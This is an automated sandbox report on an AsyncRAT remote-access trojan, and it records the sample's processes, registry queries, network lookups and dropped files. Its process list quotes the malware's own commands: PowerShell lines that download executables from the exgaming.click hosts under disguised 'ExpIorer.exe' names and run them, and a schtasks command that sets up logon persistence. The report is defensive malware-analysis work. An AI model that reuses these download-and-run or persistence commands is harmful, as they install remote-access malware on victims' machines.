Malware Analysis Report

2025-01-02 12:13

Sample ID 240418-h1wj7sed62
Target 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

Asyncrat family

Async RAT payload

AsyncRat

Async RAT payload

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 07:12

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-18 07:12

Reported

2024-04-18 07:15

Platform

win10v2004-20240412-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4004 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2224 wrote to memory of 3408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 3408 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 4912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4004 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 4004 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 4004 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 464 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2928 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2928 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2224 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2928 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2928 wrote to memory of 4140 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 4140 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 4140 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1748 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 1712 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1884 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3288 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3288 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 163.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/4004-0-0x00000000005C0000-0x00000000005D8000-memory.dmp

memory/4004-1-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4004-3-0x000000001B400000-0x000000001B410000-memory.dmp

memory/3408-14-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3408-13-0x000001FFB5430000-0x000001FFB5452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0njy1pvn.3ai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3408-15-0x000001FFB5470000-0x000001FFB5480000-memory.dmp

memory/3408-16-0x000001FFB5470000-0x000001FFB5480000-memory.dmp

memory/3408-19-0x000001FFB5B70000-0x000001FFB5CDA000-memory.dmp

memory/3408-20-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4912-22-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4912-23-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

memory/4912-24-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

memory/4004-38-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/4004-39-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4004-40-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/4912-42-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9c5f9e7437285aa87e4433bc7e0f9d7
SHA1 2363ddac1155a065a54dc6a0fc307d86bd88246b
SHA256 0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520
SHA512 7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2

C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat

MD5 de534067b6262e543715278e864405e1
SHA1 f574aedf1af8dd559e13c49b74e436a8c7371f60
SHA256 1d4dd497712d484440da7f1de1ccd15364c40fcc6b349fd3aa158a8397d93573
SHA512 8e9a0325f585e8a9ac01c26c78b29360bf43fa1a840249955aab865fe6fdca63885b7b584c53fa161b6f7c28e0c650fa1dd92e2c5d214e4b655717c1b56bd6e5

memory/4912-45-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1852-55-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1852-56-0x00000284F82A0000-0x00000284F82B0000-memory.dmp

memory/1852-57-0x00000284F82A0000-0x00000284F82B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e623e3603f24dc9b8549f420fe3c5aef
SHA1 782f48ac54014c8e165fc1f5c78bd128b7c9c640
SHA256 e40be6528731018eef4c05c5037d3164d87e33fb4d592d85de03cf71bb1980f7
SHA512 31f83dd471749e343f8ee21912f1aca206499ba415a9bfb6f1d14fe738d74d92deba452a6f76a14a830a5f6c4462c45e51622d50e87e0d59165a00d53a79a225

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/4140-62-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/4140-64-0x000000001B040000-0x000000001B050000-memory.dmp

memory/1852-66-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1328-67-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1712-68-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1712-69-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

memory/1712-70-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b5506533654486099b48ee036f9ef543
SHA1 768441bd2eb613df5b4e97d2d840726ca28b07f3
SHA256 d61f0401e469d696e9b1d27457a7e2682f399e2ca296f77e8743de23e4d9de4b
SHA512 514c722b0862672c7aa4cfb92243085fe058ea413a6001220008b71884ca8dec273ede232f05494f3a354446fc62e96b2472d476c5ee2f1d8e1e837c2aede9a6

memory/1712-90-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp

memory/1712-92-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 68f7ed7a9faf5c82f2fc821a97f68087
SHA1 bb879765b9a0d1130ee1e269eeb617ad7db133d0
SHA256 112e64911ce2ebcb7327222eed8b30f516d22dc05167b625a473dec93712e6cb
SHA512 ff1b4735aceb582cd6d0e667794efc3371ce12b8bf23f456e7415ea97b707692bfefe040b963a44699d12a08d4b3f314858621b117e169355dd0e18c7e4a1e9d

memory/1328-95-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-96-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

memory/1340-98-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp

memory/1340-99-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp

memory/1340-97-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-110-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/1340-112-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-113-0x000000001B040000-0x000000001B050000-memory.dmp

memory/1884-114-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 72ce8e6d097c0c934ce5ffde536de571
SHA1 296f99fc5f5b8b04e24203ac3d059a72fd0face4
SHA256 b2c8a41d654533b61deb2e133a6ae2db78bf1a9949d65d405528179895f9aa18
SHA512 c7ae06d8cf60ba60e493a839d93b739d5c313efb227d3e85e8db124674ca362b0e198d7bdfc197dba37e255de40376237693052ba6f2d78d9219f1ffe9f0d385

memory/1884-125-0x0000023119B50000-0x0000023119B60000-memory.dmp

memory/1884-127-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3288-133-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/3288-134-0x000001C4FF060000-0x000001C4FF070000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2578b2ca2525a3609fb41ad87f77409f
SHA1 75f907f5d330620918e5ce8126f73543fc9049f9
SHA256 3a0ed5d2741de47a225249afe38f0befa053e44d6f1792f17793188192ddfdf4
SHA512 272a28316eddc9360cc22d178a86b817db93848cf353980dccf85b681805a8cae949ae65080d4116baa52fe55c482b1906bcaae2e2fb3bf63ab01b92a1c3f775

memory/3288-140-0x000001C4FF060000-0x000001C4FF070000-memory.dmp

memory/3288-142-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp

memory/4140-143-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 07:12

Reported

2024-04-18 07:15

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
